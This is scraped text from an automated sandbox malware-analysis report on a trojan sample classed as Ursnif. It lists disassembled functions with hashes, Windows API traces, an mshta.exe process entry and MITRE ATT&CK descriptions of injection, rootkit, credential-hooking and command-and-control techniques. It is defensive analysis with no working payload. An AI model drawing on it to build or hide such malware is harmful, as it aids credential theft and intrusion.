Instruction Fuzzy Hash: A6319530A38109EFDB14DFA4D854FAE3775FF46304F118168E61AAB298DB71EA50CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D9215C0, Relevance: 6.1, APIs: 4, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.638035546.000000006D8F0000.00000020.00020000.sdmp, Offset: 6D8F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88b534a621ba7b2a6e06e91a55f2189a19921404c6e830faf13bb7ed0bd9b048
Instruction ID: 65ce5c4000cfde81d37a22e82cfff46d75e0b0fdede8270031db6e86009afa73
Opcode Fuzzy Hash: 88b534a621ba7b2a6e06e91a55f2189a19921404c6e830faf13bb7ed0bd9b048
Instruction Fuzzy Hash: 06318F70A3810DAFCB15DFA4D850BAF37BABF56304F108528E515AB298DB71EE50CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6D922700, Relevance: 6.1, APIs: 4, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.638035546.000000006D8F0000.00000020.00020000.sdmp, Offset: 6D8F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a5f93bf8ecbba8f35ffee1283ade45b9eca995f864ce2b960de487b8f4d0af8
Instruction ID: df4c2e6a7feb31b3c4db9c8f3ced7d9ede642f80d0f5d839abe045fda0c182ce
Opcode Fuzzy Hash: 3a5f93bf8ecbba8f35ffee1283ade45b9eca995f864ce2b960de487b8f4d0af8
Instruction Fuzzy Hash: 98315034A38109EFDB25DF74DC54BAE77BAAF55304F118128EA159B294DB70E940CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6D9318A5, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(6D92942A,?,?,00000000,00000000,?,6D93105D,6D92942A,00000001,?,?,?,6D92942A,?), ref: 6D9318BC
GetLastError.KERNEL32(?,6D93105D,6D92942A,00000001,?,?,?,6D92942A,?,?,?,?,6D92A109,?,?,00000000), ref: 6D9318C8

Part of subcall function 6D93188E: CloseHandle.KERNEL32(6D950970,6D9318D8,?,6D93105D,6D92942A,00000001,?,?,?,6D92942A,?,?,?,?,6D92A109,?), ref: 6D93189E

___initconout.LIBCMT ref: 6D9318D8

Part of subcall function 6D931850: CreateFileW.KERNEL32(6D94C370,40000000,00000003,00000000,00000003,00000000,00000000,6D93187F,6D93104A,?,?,6D92942A,?), ref: 6D931863

WriteConsoleW.KERNEL32(6D92942A,?,?,00000000,?,6D93105D,6D92942A,00000001,?,?,?,6D92942A,?), ref: 6D9318ED

Memory Dump Source

Source File: 00000001.00000002.638035546.000000006D8F0000.00000020.00020000.sdmp, Offset: 6D8F0000, based on PE: false

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: e83cb88f52813ea37c5988c4470d5111c10182d0f0d4cd2621895dcf65360976
Instruction ID: 860b9e55a2ff281505d9749e0fa2aef7611cae1aa9ea5a5a951c52ad3eb7c276
Opcode Fuzzy Hash: e83cb88f52813ea37c5988c4470d5111c10182d0f0d4cd2621895dcf65360976
Instruction Fuzzy Hash: A6F0AC36509265BBCF221FE5DC04A993F7AEB4B3B5F064025FA18A5520C732D860DB95

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mshta.exe PID: 5872 Parent PID: 3292 mshta.exeCOMMON

Executed Functions

Function 00000226395B0FB2, Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000003.498057994.00000226395B0000.00000010.00000001.sdmp, Offset: 00000226395B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 803b182bafeaa825f11855980a7561c2ac48f87d6f3d3a5e224f7f9bb3299046
Instruction ID: 284f3f97db5d42cf9711bc73a97cc4fda762fcfaa112ef9076672efed990b24b
Opcode Fuzzy Hash: 803b182bafeaa825f11855980a7561c2ac48f87d6f3d3a5e224f7f9bb3299046
Instruction Fuzzy Hash: 7DB0120646FBC65ED71313B30C6E35D2F70EA47524FC91AC78445C5097E00C05CE5322

Uniqueness

Uniqueness Score: -1.00%

Function 00000226395B0FC1, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000003.498057994.00000226395B0000.00000010.00000001.sdmp, Offset: 00000226395B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 27973501af16af4c243911697a4e395560ec49432cfeb988518ab88077b43a9d
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 1190021759A40A65D42451E10C4E35C5050A388560FD445C0491690148D44D42D71552

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.19261

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

Function 6D8E1000, Relevance: 24.1, APIs: 16, Instructions: 126
threadsleepsynchronizationCOMMON

Function 6D8E1C22, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Function 6D8E1B13, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Function 6D8E1252, Relevance: 3.1, APIs: 2, Instructions: 66
nativeCOMMON

Function 6D8E1AD1, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Function 6D8E1DBD, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 6D8E1792, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104
librarystringloaderCOMMON

Function 6D8E146A, Relevance: 10.6, APIs: 7, Instructions: 74
memorythreadCOMMON

Function 6D8E1314, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 6D8E18B4, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Function 6D8E116E, Relevance: 6.1, APIs: 4, Instructions: 61
stringthreadCOMMON

Function 6D8E1CCA, Relevance: 4.6, APIs: 3, Instructions: 69
memoryCOMMON

Function 6D8E15F2, Relevance: 2.5, APIs: 2, Instructions: 48
memoryCOMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre